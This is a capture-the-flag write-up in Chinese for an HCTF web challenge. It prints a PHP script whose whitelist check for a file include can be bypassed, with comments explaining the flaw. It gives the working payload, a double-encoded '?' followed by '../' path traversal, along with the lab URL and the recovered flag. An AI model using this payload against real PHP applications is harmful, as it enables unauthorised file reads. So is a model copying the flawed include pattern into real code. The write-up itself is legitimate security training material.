难度系数:
题目来源: HCTF
题目描述: 暂无
题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样)
1、点击链接进入如下界面
2、查看源代码(按F12或Fn+F12),出现以下代码。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Document</title>
</head>
<body>
<!--source.php-->
<br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
3、发现了“source.php”
则在链接后面加上“/source.php”
即是http://220.249.52.133:38343/source.php
4、输入URL之后,跳出以下信息
<?php
// Prints this file's own source, syntax-highlighted, on every request.
highlight_file(__FILE__);

/**
 * Holds the whitelist check that gates the include at the bottom of this script.
 */
class emmm
{
    /**
     * Decides whether $page names one of the whitelisted files.
     *
     * Three candidates are compared against the whitelist values in turn:
     * $page itself, $page cut at its first '?', and urldecode($page) cut at
     * its first '?'. The first match returns true.
     *
     * NOTE(review): only these derived copies are validated. $page is taken by
     * reference but never modified here, so the caller still holds the raw,
     * untruncated string after a successful check.
     *
     * @param mixed $page Requested file name from the request.
     * @return bool true on a whitelist match; otherwise false, after echoing
     *              "you can't see it".
     */
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        // Reject missing or non-string input.
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }
        // Candidate 1: the value exactly as received.
        if (in_array($page, $whitelist)) {
            return true;
        }
        // Candidate 2: everything before the first '?'. Appending '?' guarantees
        // mb_strpos finds one, so a value without '?' is kept whole.
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        // Candidate 3: URL-decode, then cut at the first '?'.
        // NOTE(review): PHP has already URL-decoded request parameters once, so
        // this is a second decode. A '?' that was encoded twice is invisible to
        // candidate 2 but appears here, and whatever follows it is never checked.
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

// Include the requested file only if it is a non-empty string that passes
// checkFile(); otherwise show the placeholder image.
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    // NOTE(review): the raw request value is included, not the whitelist entry
    // that matched, so the unchecked remainder of the string (including any ../
    // segments) reaches include. A safe version would include the matched
    // whitelist value itself and would not decode the parameter a second time.
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
5、发现了关键信息
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
6、在链接后加上/hint.php
URL: http://220.249.52.133:38343/hint.php
7、输入URL,出现以下信息
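8、然后构造payload。原理:服务器先对参数做一次URL解码,%253f变成%3f;checkFile()里的urldecode()再解码一次得到“?”,截取“?”之前的部分正好是source.php,于是通过白名单检查。但include使用的是未截取的原始参数,其中的../../../../仍会参与路径解析,所以最终包含的是白名单之外的文件。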
?file=source.php%253f/../../../../ffffllllaaaagggg
URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg
这样也可以,等等!
9、找到flag
10、OK
flag{25e7bce6005c4e0c983fb97297ac6e5a}